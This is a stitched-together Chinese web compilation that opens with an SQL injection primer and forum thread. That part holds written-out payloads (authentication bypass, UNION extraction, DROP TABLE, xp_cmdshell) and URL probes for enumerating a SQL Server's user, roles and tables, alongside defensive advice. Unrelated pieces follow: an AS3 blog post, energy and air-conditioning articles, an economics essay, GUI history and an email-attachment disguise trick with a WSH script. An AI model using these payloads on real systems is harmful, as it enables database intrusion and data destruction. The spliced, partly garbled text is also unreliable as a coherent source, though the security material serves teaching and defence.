做BS模式系统的朋友没有几个人做过SQL语句注入攻击的测试，以及测试出来的预防，对系统做了一个注入攻击测试，只是从前台用简单的语句，就改变了数据库的数据，但是感觉在安全性方面关于数据库的安全测试好像还有别的方面吧，有没有人知道应该注意那些方面那。数据库用SQL SERVER的情况下。

我做过，但没有用工具去测试过，也不知道是用什么工具，一般就针对传递传数时，在文本框中插入一段SQL语句或使用不同的数据类型输入。有时候还可以输入一段javascript 代码进去

做系统测试的不能不注意数据库的安全性问题，此前也碰到过，特搜一文转给大家看看，针对初级朋友吧。

Sql注入式攻击是指利用设计上的漏洞，在目标服务器上运行Sql 命令以及进行其他方式的攻击动态生成Sql命令时没有对用户输入的数据进行验证是Sql注入攻击得逞的主要原因

比如一个在线书店，可以根据用户的输入关键字搜索相关的图书。

string name = GetUserInput("BookName");
string script = "select table_book where book_name? like? N'%" + name + RunSql(script)
RunSql(script);

如果
name? = " ' select @@servername where '' = ' ";
这样就可以得到DB Server的名字

还以在线书店为例，用户只有登陆后才能察看自己的帐户信息，这样做是无可置疑的，然而用户验证的代码如下

//id和password直接来自用户的输入。未做处理
string id = GetUserInput("UserID");
string password = GetUserInput("UserPassword");
tring script = "select * from table_user where User_ID = '" + id? + "' and User_Password? = '" + password? + "' ";
RunSql(script);

如果用户输入的password为“ or ''=' ”，那么生成的script就为
select * from table_user where User_ID = 'UserID' and User_Password? = ' ' or ''=' '
这样一来，即使不知道用户的密码也可以察看该用户的帐户信息了

再比如，入侵者会把一些巧妙伪装的代码嵌入到你动态生成的Sql命令中，比如
Delete table_Book where 1 = 1? ...
use master--

上面的例子都是一些简单的示例，攻击者还可能通过sql的漏洞对操作系统进行攻击，
比如运行

[xp_cmdshell],[xp_regread]
当然实际上的攻击没有这么简单，攻击者还会利用系统设计的其他漏洞。比如程序把数据库返回的出错信息没有进行转换就直接输出给用户看，那么攻击者就设计一些sql语句诱导系统返回需要的信息

从上面的这些例子可以看出，对数据库访问权限的设计不当，给与每一个数据库连接太多的权限，甚至dbo或sa的权限，也是sql注入式攻击利用的主要漏洞之一。
?

1 防范sql注入式攻击
最小权限原则。特别是不要用dbo或者sa账户，为不同的类型的动作或者组建使用不同的账户，最小权限原则适用于所有与安全有关的场合对用户输入进行检查。

对一些特殊字符，比如单引号，双引号，分号，逗号，冒号，连接号等进行转换或者过滤；

使用强数据类型，比如你需要用户输入一个整数，就要把用户输入的数据转换成整数形式；

限制用户输入的长度等等。这些检查要放在server运行，client提交的任何东西都是不可信的使用存储过程，如果一定要使用sq语句，那么用标准的方式组建sql语句，比如可以利用parameters对象，避免用字符串直接拼sq命令。

当sql运行出错时，不要把数据库返回的错误信息全部显示给用户，错误信息经常会透露一些数据库设计的细节针对常用的sql注入式攻击方式对症下药

The Number Two:

如果你输入了这个代码，你将会看到返回一个询问语句：


Select ContactName FROM Customers
Where CustomerID = ''
UNION ALL Select ContactName FROM Customers
Where CustomerID <>''

通过获得空和非空顾客的ID并集，这个查询语句会返回数据库中所有的相关姓名。事实上，这个UNION技术可以被用来获得你数据库中大多数信息，看看这个CustomerID的值：

'UNION ALL Select FirstName + ' ' + LastName FROM
Employees Where LastName <>'

它将SQL语句变成：
Select ContactName FROM Customers
Where CustomerID = ''
UNION ALL Select FirstName + ' ' + LastName FROM
Employees Where LastName <>''
看，那就是攻击程序从你的数据库获得的第一个雇员的名字。

2 更多的攻击程序
如果SQL注入仅仅只有数据暴光这个弱点就已经够糟糕的了，但是，实际上一个良好的攻击程序可以通过这个弱点获取你数据库中所有的资料。看下面这个例子：

';Drop TABLE Customers;--
SQL语句变成：
Select ContactName FROM Customers
Where CustomerID = ''
; Drop TABLE Customers;-- '

这个分号使语句和SQL Server隔离，所以，这里实际上是两个语句。第一个语句不存在的名字，第二个则撤消的整个Customers表。两个—SQL Server注释符，它可以使子句不发生语法错误。

使用这个技术的变异，一个攻击程序可以在任何SQL语句或者存储过程上运行。通过使用xp_cmdshell扩展存储过程，一个攻击程序同样可以在操作系统命令下运行，显然，这是一个严重的漏洞。

3 保护自己的数据库
现在，你知道如何防范SQL注入攻击了吗？首先，你不能在用户输入中构造Where子句，你应该利用参数来使用存储进程。在最初的ASP页面下，重新写的部分将和刚才我们在表中所看到的东西相似。即使你认为在你的应用程序中没有脆弱点，你应该遵守最小特权原则。使用我们建议的其他安全技术允许你的用户仅仅访问他们能够访问的。在你没有发现你数据库脆弱点的时候，只有这样，不会使你的数据库崩溃。

4 最后的建议
这就是全部的SQL Server安全系列。也许你现在不是一个全面的专家，但是你已经了解了很多反面。下一步就是你要保护你SQL Server数据，记住你在这里所学到的知识，并利用到你的数据库中保证你的数据不被那些黑客攻击。

5 预防SQL注入式攻击
对于做ASP网站和写SQL语句的人都会遇到这种问题，什么，你没遇到过？那是你运气好，没人来hack你。

　　从根本入手，将问题防住，不仅仅“SQL注入式攻击”一个方面，还有其它的安全方面的问题，都要引起我们足够的重视，这是个习惯。

//附引文
Michael Otey(MSDN)
1.使用双引号
使用双引号替换掉所有用户输入的单引号，这个简单的预防措施将在很大程序上预防SQL注射攻击，单引号常常结束掉SQL语句，可能给于输入者不必要的权力。用双引号替换掉单引号可以使许多SQL注射攻击失败。

第一次翻译文章，不好的地方大家不要见怪：）

2.避免动态的SQL语句
动态的SQL语句是一个进行数据库查询的强大的工具，但把它和用户输入混合在一起就使SQL注射成为了可能。将动态的SQL语句替换成预编译的SQL或者存储过程对大多数应用程序是可行的。预编译的SQL或者存储过程可以将用户的输入做为参数而不是SQL命令来接收，这样就限制了入侵者的行动。当然，它不适用于你的存储过程中是利用用户输入来生成SQL命令的情况。在这种情况下，用户输入的SQL命令仍可能得到执行，你的数据库仍然有受SQL注射攻击的危险。

3.验证所有的输入
如果一个输入框只可能包括数字，那么要通过验证确保用户输入的都是数字。如果可以接受字母，那就要检查是不是存在不可接受的字符。确保你的应用程序要检查以下字符：分号，等号，破折号，括号以及SQL关键字。.NET FRAMEWORK提供了正则表达式来进行复杂的模式匹配，运用它可以达到良好的效果。另外限制用户输入的字符的长度也是一个好主意。验证用户输入是必须的，因为入侵者可以利用WEB的开放性对应用程序进行SQL注射攻击。

4.最小权力法则
应用程序使用的去连接数据库的帐户应该只拥有必须的特权，这样有助于保护整个系统尽可能少的受到入侵者的危害。应用程序不应该用SA或者管理员帐户去连接数据库。作为替代，它应该只有访问它要调用的单个库的权力。

所有的关系型数据库——包括SQL SERVER，ORACLE,IBM DB2和MYSQL都容易受到SQL注入攻击。你可以购买一些产品来保护你的系统免受SQL注射攻击，但在大多数商务中，预防SQL注射必须是基于代码级的。SQL注射攻击主要来自WEB应用程序将用户的包含动态SQL代码的输入转换成了SQL 命令给数据库执行。你可以采用下面的四个重要的步骤来保护你的WEB应用程序免受攻击。除此之外，上个月我在强调的MSDN中模式与训练也提出了一些保护数据库驱动的WEB应用程序的建议。

Sql语句密码验证的安全漏洞
Sql语句作为国际标准的数据库查询语句，在各种编程环境中得到了广泛的应用。作为一个成熟、稳定的系统，用户登陆和密码验证是必不可少的。笔者在平时的编程工作中发现，许多程序员在用sql语句进行用户密码验证时是通过一个类似这样的语句来实现的：
　　
　　Sql="Select * from 用户表 where 姓名='"+name+"' and 密码='"+password+"'"
　　
　　其中name和password是存放用户输入的用户名和口令，通过执行上述语句来验证用户和密码是否合法有效。但是通过分析可以发现，上述语句却存在着致命的漏洞。当我们在用户名称中输入下面的字符串时：111'or'1=1，然后口令随便输入，我们设为aaaa。变量代换后，sql语句就变成了下面的字符串：
　　
　　Sql="Select * from 用户表 where 姓名='111'or'1=1' and 密码='aaaa'
　　
　　我们都知道select语句在判断查询条件时，遇到或（or）操作就会忽略下面的与（and）操作，而在上面的语句中1=1的值永远为true，这意味着无论在密码中输入什么值，均能通过上述的密码验证！这个问题的解决很简单，方法也很多，最常用的是在执行验证之前，对用户输入的用户和密码进行合法性判断，不允许输入单引号、等号等特殊字符。
　　
　　上述问题虽然看起来简单，但确实是存在的。例如在互联网上很有名气的网络游戏"笑傲江湖"的早期版本就存在着这样的问题，笔者也是在看了有关此游戏的漏洞报告后才仔细分析了自己以前编写的一些程序，竟然有不少也存在着这样的漏洞。这确实应该引起我们的注意。这也暴露出包括笔者在内的年轻程序员在编程经验和安全意识上的不足。同时也提醒我们编程工作者在程序设计时应当充分考虑程序的安全性，不可有半点马虎，一个看似很小的疏漏可能就会造成很严重的后果。

是否支持多句查询
http://www.xxx.com/xxxnews/shownews.asp?id=51;declare @a int--

是否支持子查询
http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0

返回用户名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And user%2Bchar(124)=0

当前用户是否为 sysadmin 固定服务器角色的成员。
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1

PS:0x730079007300610064006D0069006E00 = sysadmin

当前用户是否为 db_owner 固定数据库角色的成员
http://www.xxx.com/xxxnews/shownews.asp?id=51 And Cast(IS_MEMBER(0x640062005F006F0077006E0065007200) as varchar(1))%2Bchar(124)=1

0x640062005F006F0077006E0065007200 = db_owner

返回数据库名
http://www.xxx.com/xxxnews/shownews.asp?id=51 And db_name()%2Bchar(124)=0

操作系统和SQLserver版本
http://www.xxx.com/99568news/shownews.asp?id=51 And @@version = 1

本地服务器名称
http://www.xxx.com/99568news/shownews.asp?id=51 And @@SERVERNAME = 1

http://www.xxx.com.cn/newhomelink/site/News/Content.asp?NewsID=1077 And (Select Top 1 cast(name as varchar(8000)) from(Select Top 1 id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0 --第一个表名

用 AS3 写出了 Web 2.0 风格：平滑，有光泽而且稍微有点阴影。

OK, it's trendy to the extreme, but I was checking out that "Web 2.0" style you see all over the place now - you know, the slick, glossy, rounded corner, slight dropshadowed look. Come on, you know you love it. Anyway, I started analyzing how it some of it was done and started looking at coding it into AS3. The result, so far, is my GradientBar class, which you can invoke like so:

PLAIN TEXT

Actionscript:

1. 
   

   var bar:GradientBar = new GradientBar(barColor, barWidth, barHeight, cornerRadius=5);

   
   

It extends Sprite, so you can use it as a display object, like so:

PLAIN TEXT

Actionscript:

1. 
   
   var bar:GradientBar = new GradientBar(barColor, stage.stageWidth - 20, 34, 10);
   
   


2. 
   
   bar.x = 10;
   
   


3. 
   
   bar.y = 10;
   
   


4. 
   
   bar.shadowType = "none";
   
   


5. 
   
   addChild(bar);
   
   

And here's an example in use:

You can get the source here:

http://www.bit-101.com/as3/gradientbar/srcview/
(Note that the internal shapes are draw in into Shape objects!)

This usage example is a visual example only, not really the way I would code an interactive button bar, but still looks pretty cool. And the GradientBar class itself needs a lot of work itself. I'm just throwing it out there as an experiment more than anything else.

即:

传热学在钻井工程中的应用
传热学在油藏工程中的应用
传热学在采油工程中的应用

我国是能源十分丰富的国家，从已探明的能源资源来看，水力资源居世界第一位，煤炭居世界第三位．仅次于美国和前苏联{石油居世界第八位；燃气居世界第十六位但是．我国能源资源生产满足不了国民经济发展的需要，能源生产长期落后于整个工业发展同时，不能忽视我国人口众多+如果按人H折算．我国的能源资源还谈不上富裕事实上，当前我国能源经济供需比较紧张，缺I：l较大+情况相当严重，能源问题已成为我国国民经济技展的重要制约因素。

在占我国总能比例约40%的供暖、空调中同样存在这样的问题。单是采暖，我国一年集中供热用能为4 760万吨标煤全年采暖用煤9 410万吨标煤．1995年建筑能耗达4亿吨标煤。今后随着我国经济的不断发展，人民生话水平的逐步提高．建筑能耗将更加突出因此，节能是当前解决我国能源供需矛盾的一项最有效、最经济、最迅速的途径。为此，需要重视能源节约和缘台利用，改善目前用能现状。

目前城市常见的供热空调能源为煤、电、油、气。其中天然气是有发展前景的城市气源。在供热空调领域，以天然气为能源，用燃气机驱动压缩机并充分利用发动机废热、工业余热以及低品位环境热量的采暖、空调装置为低污染的环保装置。目前有待进一步明确的是燃气机热泵及其它不同供热空调方案的能量利用及经济性如何。

结论

(1)燃气热泵供热空调系统具有高的一次能源利用率，用于供热的能量为燃料能量的1．5倍，与燃煤和燃气锅炉相比．供热的一次能源利用率可分别提高110％ 和75％以上。

(2)燃气热泵的年单位面积供热能耗最低，在相同的供热面积下燃气热泵的标准一次能源消耗量仅为燃气锅炉的50％ 。

(3)在目前的能源价格等条件下，我国燃气热泵供热空调方案的年单位面积运行能耗费用约为燃煤锅炉+空调的1．5倍，而电热锅炉+空调的年单位面积运行能耗费用约为燃煤锅炉+空调的5倍。

(4)在目前的能源价格等条件下，燃煤锅炉+冷水机组的年单位面积总成本最低，其次是燃气热泵、电动冷热水机组和燃气锅炉+冷水机组，电热水锅炉+冷水机组的年单位面积成本最高。

(5)为了提高节能环保产品经济性，应该按照消耗能源需要的治理技术和工艺情况(包括生产该能源时的排放治理情况)征收能源消耗排放治理费，还应对节能环保产品在产品销售税方面予以支持。

家用中央空调按照传统的方法可以分为三种类型：风管式系统、冷/热水机组、多联型系统。

而现在，家用中央“至暖”空调，以其先进的工作原理和优越的性能，业已成为家用中央空调领域的第四种产品类型，并迅速获得市场的认可。

那么这几种家用中央空调系统有什么特点呢？新出现的“至暖”空调又具备那些先进的性能呢？

1. 风管式系统

风管式系统顾名思义是以空气作为输送介质，它利用冷水机组集中制取冷量，将新风冷却/加热，与回风混合后送入室内。如果没有新风，则只将回风加热/冷却。

风管式系统的室外即可有多台压缩机和一台风冷冷凝器组成，室内机是由蒸发器和循环风机组成，其台数与压缩机台数相同，形式有多种如天花式，暗藏天花式等。该系统的特点是室外机的冷凝器采用空气冷却，每台压缩机与室内机一对一配置形成独立系统，室外机的冷凝器与室内机蒸发器之间的连接统管最长可达25m，暗藏是天花机（室内机）可接风管并根据室内空间情况能将送风口均匀布置在室内，还可接入新风管引进新风，系统完全依靠冷媒循环完成空调要求，该系统既有分体式空调的使用功能，又有中央空调的送风效果。

优点：相对于其他的家用小型中央空调型式，风管式系统初投资较小。新风系统使得空气质量提高，人体舒适度提高。

缺点：室外温度过低无法启动，需要另增加采暖系统。

2. 冷/热水机组

冷/热水机组的输送介质通常为水或者乙二醇溶液。它通过室外主机产生出空调冷/热水,由管路系统输送至室内的各末端装置，在末端装置处冷/热水与室内空气进行热量交换,产生冷/热风，从而消除房间空调负荷。它是一种集中产生冷/热量，分散处理个房间负荷的空调系统形式。冷/热水机组的末端装置通常为风机盘管。

冷媒系统一般配备一台压缩机，冷凝器由空气冷却，末端设备采用风机盘管。冷冻水系统由冷冻泵、补水阀、水箱、防空阀、平衡阀和循环水管线组成。

优点：由于风机盘管可以调节风机转速，所以可以对每一个空调房间进行单独调节。较为节能。

缺点：造价高，无法直接引入新风。

3.多联机型系统

多联机型系统，即制冷剂流量系统。顾名思义是一种制冷剂系统，它以压缩制冷剂为输送介质，采用一台压缩机带动多台室内机，室外主机由外侧换热器、压缩机和其他附件组成。室内机由直接蒸发式换热器和风机组成。制冷剂通过管路由室外机送至室内机，通过控制管路中制冷剂的流量以及进入室内散热器的制冷流量，来满足不同负荷房间对热湿的要求。 与其他冷媒型空调系统最主要的区别为：该系统压缩机采用变频调速进行控制，当系统处于低负荷时，通过变频控制器控制压缩机转速，使系统内冷媒的循环流量得以改变，从而对制冷量进行自动控制以符合使用要求，对一般住宅用、家用空调系统只需设一台变频压缩机

优点：可以满足不同房间的需求，节能，热体舒适性好。

缺点：室外温度过低无法启动，需要另增加采暖系统

4.“至暖”空调系统

至暖空调系统采用的是来自英国的IHA集暖技术，它将热水采暖和电能制冷合二为一，不仅具有以上空调系统的制冷性能，更具备卓越的采暖能力，它可实现零下50度强劲采暖，完全取代暖气片，这将为住户节约2—5％的使用面积，使更多建筑拥有宜人的空气调节功能，至暖空调同时又拥有新风、加湿、电子除尘、活性炭过滤、电子杀菌等多种健康舒适功能。“至暖“空调可称为“双能一体 恒温管家！”

家用中央至暖空调具有以下优势：

（1）强劲采暖 超级兼容：利用先进的IHA集成采暖技术，室内主机可直接连接配套暖浴壁挂炉，取代暖气片，升温速度快，零下50度超强供热。

（2）双能全温 高效集成：集成热泵热水两套系统，自动热补偿，性能卓著，四季全温，尊显居家品位。

（3）四位一体 自主灵活：全面解决家居环境对采暖、制冷、热水、新风功能的需求，四位一体随心所欲，舒适健康到家。

（4）数码智能 操控自如：定温、定时，精确掌控，风口联动，总控单控，随心所欲。

（5）新风引入 健康呼吸：可根据室内空气状况适时引入新风，调节室内空气质量，保持室内空气品质，清新健康，自由呼吸。

（6）分户计量 先进节能：可以根据家居环境的实际需要取冷热量，运行效率更高，采暖比暖气片节能30%-50%；制冷比传统柜机节能20%-30%；节约装修费用，节约居室使用面积2%-5%；

（7）超强保护 故障自检：机组多重保护，故障自动检测。

（8）模块加装 随需定制：无论需要加湿、负离子、氧吧还是杀菌，皆可因你而定，随需组合。至暖空调可广泛应用于：高档住宅、别墅、中小型办公楼、宾馆、酒店等建筑场所。

我国北方普遍使用的集中采暖系统将有可能被家用空调取代。美国艾默生电气公司（Emerson）新的制热技术使得空调能够在超低温条件下高效运转，住户可以通过室内同一台空调同时满足夏季制冷和冬季采暖的需求，不再需要额外的集中采暖系统，从而大大降低能源消耗水平，提高能效。日前，这个新的热泵系统技术已经得到中国建设部的最高技术认可，被评定为"世界领先"技术。

这项采用艾默生谷轮强热型数码旋涡技术（Copeland Digital Scroll Heating）的低温热泵多联机组是近7年来业内首个得到建设部这一最高评价的新技术。与传统热泵相比，通过使用最新强热型旋涡技术，新的热泵系统具有更加强劲的制热能力，即使在室外超低温的情况下也能够做到高效运转。据悉，采用这项技术的超低温热泵多联机系统将在年内推出。格力公司采用谷轮强热型数码旋涡技术制造的世界第一台超低温热泵多联机组已诞生。

目前在我国，采用热泵这一空气调节设备的空调占到市场份额的80％左右。而在北方寒冷地区传统热泵无法有效满足制热，安装集中采暖的热水锅炉系统成了唯一的选择。额外的采暖系统造成能源消耗水平不断上升，现在这种状况有望得到改变。此外，这项新技术将被运用到采用强热型旋涡压缩机的一拖一家用热泵和空调系统上，空调的节能性和便利性将有可能达到新的水准。巨大的产品创新空间和市场空间使得这项技术前景看好。

视点：最后一场乘客的票价

2000年09月29日 中国经济时报

——边际分析法

从杭州开往南京的长途车即将出发。无论哪个公司的车，票价均为50元。一个匆匆赶来的乘客见一家国营公司的车上尚有空位，要求以30元上车，被拒绝了。他又找到一家也有空位的私人公司的车，售票员二话没说，收了30元允许他上车了。哪家公司的行为更理性呢？乍一看，私人公司允许这名乘客用30元享受50元的运输服务，当然亏了。但如果用边际分析法分析，私人公司的确比国营公司精明。

说起“边际”这个词，许多人觉得有点神秘，其实说透了你就知道，你经常也会不自觉地用这个概念来分析问题。

经济学研究经济规律也就是研究经济变量相互之间的关系。经济变量是可以取不同数值的量，如通货膨胀率、失业率、产量、收益等等。经济变量分为自变量与因变量。自变量是最初变动的量，因变量是由于自变量变动而引起变动的量。例如，如果研究投入的生产要素和产量之间的关系，可以把生产要素作为自变量，把产量作为因变量。自变量(生产要素)变动量与因变量(产量)变动量之间的关系反映了生产中的某些规律。分析自变量与因变量之间的关系就是边际分析法。

“边际”这个词可以理解为“增加的”的意思，“边际量”也就是“增量”的意思。说的确切一些，自变量增加一单位，因变量所增加的量就是边际量。比如说，生产要素(自变量)增加一单位，产量(因变量)增加了2个单位，这因变量增加的两个单位就是边际产量。或者更具体一些，运输公司增加了一些汽车，每天可以多运200多名乘客，这200名乘客是边际量。边际分析法就是分析自变量变动一单位，因变量会变动多少。

经济学家提出“边际”和“边际分析”的概念不是故弄玄虚，而是为了作出更正确的决策。经济学家常说，理性人要用边际量进行分析就是这个道理。

我们可以用最后一名乘客的票价这个例子来说明边际分析法的用处。当我们考虑是否让这名乘客以30元的票价上车时，实际上我们应该考虑的是边际成本和边际收益这两个概念。边际成本是增加一名乘客(自变量)所增加的收入(因变量)。在我们这个例子中，增加这一名乘客，所需磨损的汽车、汽油费、工作人员工资和过路费等都无需增加，对汽车来说多拉一个人少拉一个人都一样，所增加的成本仅仅是发给这个乘客的食物和饮料，假设这些东西值10元，边际成本也就是10元。边际收益是增加一名乘客(自变量)所增加的收入(因变量)。在这个例子中，增加这一名乘客增加收入30元，边际收益就是30元。

在根据边际分析法作出决策时就是要对比边际成本与边际收益。如果边际收益大于边际成本，即增加这一名乘客所增加的收入大于所增加的成本，让这名乘客上车就是合适的，这是理性决策。如果边际收益小于边际成本，让这名乘客上车就要亏损，是非理性决策。从理论上说，乘客可以增加到边际收益与边际成本相等时为止。在我们的例子中，私人公司让这名乘客上车是理性的，无论那个售票员是否懂得边际的概念与边际分析法，他实际上是按边际收益大于边际成本这一原则作出决策的。国营公司的售票员不让这名乘客上车，或者是受严格制度的制约(例如，售票员无权降价)，或者是缺“边际”这根弦。我们常说国营企业经营机制不如私人企业灵活，这大概可以算一个例子。

边际分析法在经济学中运用极广。所以，边际这个概念和边际分析法的提出被认为是经济学方法的一次革命。在经济学中，边际分析法的提出不仅为我们作出决策提供了一个有用的工具，而且还使经济学能运用数学工具。边际分析所表示的自变量与因变量之间变动的关系可以用微分来表示。由此数学方法在经济学中可以得到广泛应用。现在数学在经济学中运用十分广泛，对推动经济学本身的发展和解决实际经济问题起到了重大作用。有兴趣的读者看一点更高深的经济学著作就会体会到这一点。

当然，即使不懂数学也仍然可以用边际分析法。例如，算算多上一年学(或者参加一个电脑学习班)要多花多少钱，以后又会增加多少收入。这不就是用边际分析分法思考问题了吗？像经济学家一样思考并不难。把上学的边际成本与边际收益给朋友讲讲，你就有点经济学家的味了。


简单地说，边际成本就是额外一单位产量所引起的总成本的增加。

　　GUI(Graphical User Interface)是一种结合计算机科学、美学、心理学、行为学，及各商业领域需求分析的人机系统工程，强调人—机—环境三者作为一个系统进行总体设计。

　　这种面向客户的系统工程设计其目的是优化产品的性能，使操作更人性化，减轻使用者的认知负担，使其更适合用户的操作需求，直接提升产品的市场竞争力。

　　GUI即人机交互图形化用户界面设计。纵观国际相关产业在图形化用户界面设计方面的发展现状，许多国际知名公司早己意识到GUI在产品方面产生的强大增值功能，以及带动的巨大市场价值，因此在公司内部设立了相关部门专门从事GUI的研究与设计，同业间也成立了若干机构，以互相交流GUI设计理论与经验为目的。随着中国IT产业，移动通讯产业，家电产业的迅猛发展，在产品的人机交互界面设计水平发展上日显滞后，这对于提高产业综合素质，提升与国际同等业者的竞争能力等等方面无疑起了制约的作用。

GUI 定义   
    GUI--Graphical User Interface即人机交互图形化用户界面设计经常读做“goo-ee”
    准确来说GUI就是屏幕产品的视觉体验和互动操作部分。

GUI 准则
    ◆减少用户的认知负担
    ◆保持界面的一致性。
    ◆满足不同目标用户的创意需求
    ◆用户界面友好性
    ◆图标识别平衡性
    ◆图标功能的一致性
    ◆建立界面与用户的互动交流

GUI 应用领域
    ◆手机通讯移动产品
    ◆电脑操作平台
    ◆软件产品
    ◆PDA产品
    ◆数码产品
    ◆车载系统产品
    ◆智能家电产品
    ◆游戏产品
    ◆产品的在线推广

GUI 的发展史   
    图形用户界面这一概念是70年代由施乐公司帕洛阿尔托研究中心提出。我们现在据说的普遍意义上的GUI便是由此产生的。
    ★ 1973年施乐公司帕洛阿尔托研究中心（Xerox PARC）施乐研究机构工作小组最先建构了WIMP(也就是视窗，图标，菜单和点选器/下拉菜单)的范例，并率先在施乐一台实验性的计算机上使用。
    ★ 1980年ThreeRivers Perq graphical workstation
    ★ 1981年 Xerox Star
    ★ 1983年 Visi On
此图形用户界面最开始是一家公司为电子制表软件而设计的，这软件就是具有传奇色彩的VisiCalc. 在1983年，首次介绍了在PC环境下的“视窗”和鼠标的概念，其先于“微软视

窗”的出现，但VisiOn并没有成功研制。
    ★ 1984年苹果的Lisa与Machintosh
Macintosh,于1984年发布，是首例成功使用GUI并用于商业用途的产品。从1984年,Macintosh的GUI随着时间的推移一直在修改，在System 7中，做了主要的一次升级。2001年的Mac

OS X问世是其最大规模的一次修改。
    ★ 1985年Amiga Intuition阿米高直觉电脑
Amiga计算机公司于1985年研究一款运用GUI的电脑，叫Intuition。Amiga GUI在当时独一无二，因为在那时候GUI还不能提供足够的控制功能，AMIga就已经能使用弹出式的命令行

界面(CLI)了。
    ★ 1986年GEM
GEM是基于IBM电脑系统上运行而发明的一种可选择性视窗系统，也可以在MS-Dos(像微软视窗)或者CPM-86上运行。GEM在PC领域只取得很小的成功，但是后来做为本土GUI被应用到

了Atari ST电脑之上。
    ★ 1987年Apple Macintosh II
1987年3月APPLE公司推出了MAC II,是第一台有颜色的MAC苹果机.
    ★ 1988年RISC OS
RISC OS是一种彩色GUI操作系统，其使用三键鼠标以及任务栏（也叫图标栏），以及一个文件导航器（类似于Mac OS）。
    ★ GEOS
GEOS是另外一个非常早期的图形桌面系统。最开始是为了8-bit家庭电脑Connodore 64而制作的，后来转入到IBM的电脑系统。
    ★ 1990年Microsoft Windows 3.0
第一个微软视窗版本在1985年发表，是基于MAC　OS的GUI设计。Window 1.0是基于MS-DOS操作系统的图形化用户界面（GUI），Windows 2.0是后续版本。后来的一系列GUI视窗版本

都基本类似于windows 3.0的界面。
    ★ 1992年Amiga Workbench 3
    ★ 1993年Windows NT
    ★ 1994年 QNX Photon Microgui
QNXr软件系统发布了第一个嵌入式微核的视窗系统.
    ★1995年 Windows 95
1995年8月24日，微软发布了Windows 95.
    ★ 1996年IBM Releases OS/2 Warp 4
    ★ 1997年Mac OS 8:
1997年7月,MAC OS 8发布,成为当时热销的一个软件.
    ★ 1998年 Windows 98
    ★ 1999年APPLE Mac OS X
    ★ 2000年APPLE AQUA
2000年1月5日,APPLE发布了AQUA, 是MacOS X的新界面.
    ★ 2001年Windows XP
    ★ 2003年 Windows Server 2003

◆形象授权手机GUI概述
◆智能手机GUI概述

流行手机GUI 发展特点
◆画面品质更趋细腻精致
◆操作方式更趋.个性化
◆娱乐型更强
◆操作方式更新奇
◆视觉体验更细分

授权手机GUI概述

以各种知名形象作为主题的GUI方案
特点：紧跟市场热点　把握已有用户群

Motolora C350/C353 几米风格      OKWAP 166 Hello kitty

卡通主题--哆啦A梦的世界

水墨画主题--齐白石

网络游戏主题－－天堂II

奥斯卡最佳影片主题－－魔戒三部曲

智能手机GUI 概述

兼具PDA和手机强大功能、操控性更好的智能手机难免因其功能和操作平台，在GUI上受到更多的限制。

智能手机GUI 概述
智能手机GUI重要点：
◆更为人性化的视觉优化
◆更具识别性的图标及其它元素
◆更具可操控性和扩充性的使用易用性
◆更具有企业品牌特色的视觉识别性

GUI 的品牌建立目标
如何使得用户能够接受产品、并加强对产品品牌印象、进而提升他们对产品的依赖度、信任度、最终成为最忠实的固定目标消费群，对于产品而言，无疑是非常重要的关键点。因此具有企业文化特征的产品品牌需要渗入进产品的GUI,形成其独特的产品魅力。

什么是品牌
品牌是从具体产品中抽象出来的概念，潜移默化地影响着人们的思维定式品牌不再以某种产品的具体功能为诉求对象，转而探求一个社会的精神状态以及人们的心理活动，而这些又构成了产品得以推广的深层市场基础。

品牌包含了：质量、价格、服务、信誉、文化、认知

品牌成功的因素
表面上看产品的品质、设计和不断创新吸引了消费者，实质上应归结于其品牌背后所融入的企业文化所产生的四种价值取向：
◆消费者满意
◆尊重个人
◆成就感
◆不断的学习

产品GUI品牌趋势
在产品性能和品质越来越同质化的竞争条件下，唯一可以形成差异和不可模仿的就是由企业文化所塑造出的品牌。而个性的衍变而对产品所产生的文化价值和内涵，将是趋势所在。

点诚设计为广大用户提供优质、全面、量身定做的软件界面设计、游戏界面设计、手机界面设计、PDA界面设计、MP3界面设计、MP4界面设计、掌上多媒体播放器界面设计、掌上学习机界面设计、网站界面设计、数字电视界面设计、电子显示屏终端界面、手机游戏设计等设计方案。

假如收到的邮件附件中有一个看起来是这样的文件：QQ靓号放送.txt，您是不是认为它肯定是纯文本文件？我要告诉您，不一定！它的实际文件名可以是QQ靓号放送.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}。{3050F4D8-98B5-11CF-BB82- 00AA00BDCE0B}在注册表里是HTML文件关联的意思。但是存成文件名的时候它并不会显现出来，您看到的就是个.txt文件，这个文件实际上等同于QQ靓号放送.txt.html。那么直接打开这个文件为什么有危险呢？请看如果这个文件的内容如下：***（内容过于危险，这里不予给出）。

您可能以为它会调用记事本来运行，可是如果您双击它，结果它却调用了HTML来运行，并且自动在后台开始格式化d盘，同时显示“Windows is configuring the system。Plase do not interrupt this process。”这样一个对话框来欺骗您。您看随意打开附件中的.txt的危险够大了吧？

欺骗实现原理：当您双击这个伪装起来的.txt时候，由于真正文件扩展名是.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}，也就是.html文件，于是就会以html文件的形式运行，这是它能运行起来的先决条件。

文件内容中的第2和第3行是它能够产生破坏作用的关键所在。其中第3行是破坏行动的执行者，在其中可以加载带有破坏性质的命令。那么第2行又是干什么的呢？您可能已经注意到了第2行里的“WSCript”，对！就是它导演了全幕，它是实际行动总指挥。

WScript全称Windows Scripting Host，它是Win98新加进的功能, 是一种批次语言/自动执行工具——它所对应的程序“WScript.exe”是一个脚本语言解释器，位于c:WINDOWS下，正是它使得脚本可以被执行，就象执行批处理一样。在Windows Scripting Host脚本环境里，预定义了一些对象，通过它自带的几个内置对象，可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。

下面我们通过一个小例子来说明Windows Scripting Host功能是如何的强大，使用又是怎样的简单，被有心人利用后的威胁有多大。例如有内容如下的*.vbs文件:

　Set so=CreateObject("Scripting.FileSystemObject")

so.GetFile(c:windowswinipcfg.exe).Copy("e:winipcfg.exe")


